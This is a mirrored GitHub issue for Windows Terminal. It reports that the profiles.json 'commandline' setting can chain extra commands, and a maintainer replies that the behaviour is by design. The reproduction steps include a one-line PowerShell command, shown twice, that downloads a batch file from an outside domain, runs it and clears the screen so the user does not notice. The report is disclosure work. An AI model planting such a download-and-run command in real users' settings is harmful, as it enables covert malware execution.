starred/terminal
1
0
Fork 0
mirror of https://github.com/microsoft/terminal.git synced 2026-02-03 21:25:34 +00:00
Code Issues 19.0k Packages Projects Releases 20 Wiki Activity

[Possible Security Issue] > profiles.json "commandline" option #3110

New Issue
Closed
opened 2026-01-30 23:13:15 +00:00 by claunia · 1 comment
claunia commented 2026-01-30 23:13:15 +00:00
Owner
Copy Link

Originally created by @ProHackTech on GitHub (Aug 4, 2019).

Environment

Windows Edition: Windows 10 Education
Version: 1903
OS Build: 18362.10005
Windows Terminal version: 0.3.2142.0

Possible Bug: Description

In profiles.json, under profiles, powershell.exe is the default profile when Terminal app fresh installed. Powershell is called by terminal app using: "commandline" setting with parameter "powershell.exe".

We can add parameters after "powershell.exe" to automate tasks. This is happen when each new tab with powershell is opened. But we can go futher to exploit this feature.

The GIF demonstration shows one line command to download an (assumed) infected executable from unknown domain, keep it in the public/downloads directory to evade low privilege errors, run the infected executable, clear the screen immediately and run powershell.exe again.

It's assumed that the executable will a malware that quickly starts and closes itself. The user will find it hard to detect if anything is happenning because a fresh powershell instance is called after the downloaded executable is run. Also, there is no warning prompt while running the executable as shown in demonstation.

demo video

Steps to reproduce

  • Create a sample batch script for demo purpose with anything inside. Here I've created script to open multiple cmd windows

  • Upload the file to any shady website. Here I've used my own not-trusted website

  • Paste the following command after "powershell.exe" for the setting "commandline" under profiles in profiles.json

command:
wget -O 'C:\\Users\\Public\\Downloads\\VIR.bat' prohack.tech/VIR.bat ; [Diagnostics.Process]::Start('C:\\Users\\Public\\Downloads\\VIR.bat') ; clear ; powershell.exe

  • Run the terminal app.

Expected behavior

Expected behavior is to not allow arguments directly from profiles.json setting because another applications could potentially infect(?) the settings file to download untrusted files.

Actual behavior

Arguments are allowed to run from profiles.json setting.

Note

Marked as possible security issue because exploiting this may be tricky, since larger file download through wget can be seen as being downloaded by the user. Also, first-hand running processes will show details in powershell instance. But as shown in the demo, processes started from the downloaded executable do not show in powershell. Could possibly be exploited without the user knowing.

Finding profiles.json is also easy with this string: "%LOCALAPPDATA%\Packages\Microsoft.WindowsTerminal_8wekyb3d8bbwe\RoamingState".
If this is a real issue, name it 'profile commandline injection' :P

Originally created by @ProHackTech on GitHub (Aug 4, 2019). <!-- 🚨🚨🚨🚨🚨🚨🚨🚨🚨🚨 I ACKNOWLEDGE THE FOLLOWING BEFORE PROCEEDING: 1. If I delete this entire template and go my own path, the core team may close my issue without further explanation or engagement. 2. If I list multiple bugs/concerns in this one issue, the core team may close my issue without further explanation or engagement. 3. If I write an issue that has many duplicates, the core team may close my issue without further explanation or engagement (and without necessarily spending time to find the exact duplicate ID number). 4. If I leave the title incomplete when filing the issue, the core team may close my issue without further explanation or engagement. 5. If I file something completely blank in the body, the core team may close my issue without further explanation or engagement. All good? Then proceed! --> <!-- This bug tracker is monitored by Windows Terminal development team and other technical folks. **Important: When reporting BSODs or security issues, DO NOT attach memory dumps, logs, or traces to Github issues**. Instead, send dumps/traces to secure@microsoft.com, referencing this GitHub issue. Please use this form and describe your issue, concisely but precisely, with as much detail as possible. --> # Environment ```none Windows Edition: Windows 10 Education Version: 1903 OS Build: 18362.10005 Windows Terminal version: 0.3.2142.0 ``` # Possible Bug: Description In profiles.json, under profiles, powershell.exe is the default profile when Terminal app fresh installed. Powershell is called by terminal app using: "commandline" setting with parameter "powershell.exe". We can add parameters after "powershell.exe" to automate tasks. This is happen when each new tab with powershell is opened. But we can go futher to exploit this feature. The GIF demonstration shows one line command to download an (assumed) infected executable from unknown domain, keep it in the public/downloads directory to evade low privilege errors, run the infected executable, clear the screen immediately and run powershell.exe again. It's assumed that the executable will a malware that quickly starts and closes itself. The user will find it hard to detect if anything is happenning because a fresh powershell instance is called after the downloaded executable is run. Also, there is no warning prompt while running the executable as shown in demonstation. <h3 align="center"> <a href="https://prohack.tech/MS_Terminal_Possible_Bug.mp4" target="_blank"> <img src="https://prohack.tech/demo.png" alt="demo video" width="480" height="360" border="10" /> </a> </h3> # Steps to reproduce - Create a sample batch script for demo purpose with anything inside. Here I've created script to open multiple cmd windows - Upload the file to any shady website. Here I've used my own not-trusted website - Paste the following command after "powershell.exe" for the setting "commandline" under profiles in profiles.json command: `wget -O 'C:\\Users\\Public\\Downloads\\VIR.bat' prohack.tech/VIR.bat ; [Diagnostics.Process]::Start('C:\\Users\\Public\\Downloads\\VIR.bat') ; clear ; powershell.exe` - Run the terminal app. # Expected behavior Expected behavior is to not allow arguments directly from profiles.json setting because another applications could potentially infect(?) the settings file to download untrusted files. # Actual behavior Arguments are allowed to run from profiles.json setting. # Note Marked as possible security issue because exploiting this may be tricky, since larger file download through wget can be seen as being downloaded by the user. Also, first-hand running processes will show details in powershell instance. But as shown in the demo, processes started from the downloaded executable do not show in powershell. Could possibly be exploited without the user knowing. Finding profiles.json is also easy with this string: "%LOCALAPPDATA%\Packages\Microsoft.WindowsTerminal_8wekyb3d8bbwe\RoamingState". If this is a real issue, name it 'profile commandline injection' :P
claunia added the Needs-TriageNeeds-Tag-Fix labels 2026-01-30 23:13:15 +00:00
claunia commented 2026-01-30 23:13:16 +00:00
Author
Owner
Copy Link

@DHowett-MSFT commented on GitHub (Aug 4, 2019):

Hey, I appreciate you taking the time to write up this report.

In general, we are operating under the principle if an application has the privilege to write files into a directory owned by a user, it also already has privilege enough to perform any other operation as that user.

With the access a piece of malicious code would need to write malicious_part2.exe into the user’s Terminal profile, it would also be able to just run malicious_part2 itself. As Raymond Chen would say, “you’re already on the other side of the air-tight hatch.”

@DHowett-MSFT commented on GitHub (Aug 4, 2019): Hey, I appreciate you taking the time to write up this report. In general, we are operating under the principle if an application has the privilege to write files into a directory owned by a user, it also _already_ has privilege enough to perform any other operation as that user. With the access a piece of malicious code would need to write `malicious_part2.exe` into the user’s Terminal profile, it would also be able to just run malicious_part2 itself. As Raymond Chen would say, “you’re already on the other side of the air-tight hatch.”
Sign in to join this conversation.
No Branch/Tag Specified
Branches Tags
Labels
Clear labels
Reserved
A11yCO
A11yMAS
A11ySev1
A11ySev2
A11ySev3
A11yTTValidated
A11yUsable
A11yVoiceAccess
A11yWCAG
Area-Accessibility
Area-AtlasEngine
Area-AzureShell
Area-Build
Area-Build
Area-Chat
Area-CmdPal
Area-CodeHealth
Area-Commandline
Area-CookedRead
Area-DefApp
Area-Extensibility
Area-Fonts
Area-GroupPolicy
Area-i18n
Area-Input
Area-Interaction
Area-Interop
Area-Localization
Area-Output
Area-Performance
Area-Portable
Area-Quality
Area-Remoting
Area-Rendering
Area-Schema
Area-Server
Area-Settings
Area-SettingsUI
Area-ShellExtension
Area-ShellExtension
Area-ShellExtension
Area-Suggestions
Area-Suggestions
Area-TerminalConnection
Area-TerminalControl
Area-Theming
Area-UserInterface
Area-VT
Area-Windowing
Area-WPFControl
AutoMerge
Blocking-Ingestion
Culprit-Centennial
Culprit-WinUI
Disability-All
Disability-Blind
Disability-LowVision
Disability-Mobility
External-Blocked-WinUI3
Fixed
Gathering-Data
good first issue
HCL-E+D
HCL-WindowsTerminal
Help Wanted
Impact-Compatibility
Impact-Compliance
Impact-Correctness
Impact-Visual
In-PR
InclusionBacklog
InclusionBacklog-Windows TerminalWin32
InclusionCommitted-202206
Issue-Bug
Issue-Docs
Issue-Feature
Issue-Feature
Issue-Question
Issue-Samples
Issue-Scenario
Issue-Task
Needs-Attention
Needs-Author-Feedback
Needs-Bisect
Needs-Discussion
Needs-Repro
Needs-Tag-Fix
Needs-Tag-Fix
Needs-Triage
No-Recent-Activity
Priority-0
Priority-1
Priority-2
Priority-3
Product-Cmd.exe
Product-Colortool
Product-Colortool
Product-Colortool
Product-Conhost
Product-Conpty
Product-Meta
Product-Powershell
Product-Terminal
Product-WSL
pull-request
Mirrored from GitHub Pull Request
 Resolution-Answered
Resolution-By-Design
Resolution-Duplicate
Resolution-External
Resolution-Fix-Available
Resolution-Fix-Committed
Resolution-No-Repro
Resolution-Won't-Fix
Severity-Blocking
Severity-Crash
Severity-DataLoss
spam
this-will-be-a-breaking-change
Tracking-External
WindowsTerminal_Win32
Work-Item
zAskModeBug
zInbox-Bug
No Label Needs-Tag-Fix Needs-Triage
Milestone
No items
No Milestone
Projects
Clear projects
No project
Assignees
Clear assignees
claunia
No Assignees
1 Participants
Notifications
Due Date
No due date set.
Dependencies

No dependencies set.

Reference: starred/terminal#3110
Delete Branch "%!s()"

Deleting a branch is permanent. Although the deleted branch may continue to exist for a short time before it actually gets removed, it CANNOT be undone in most cases. Continue?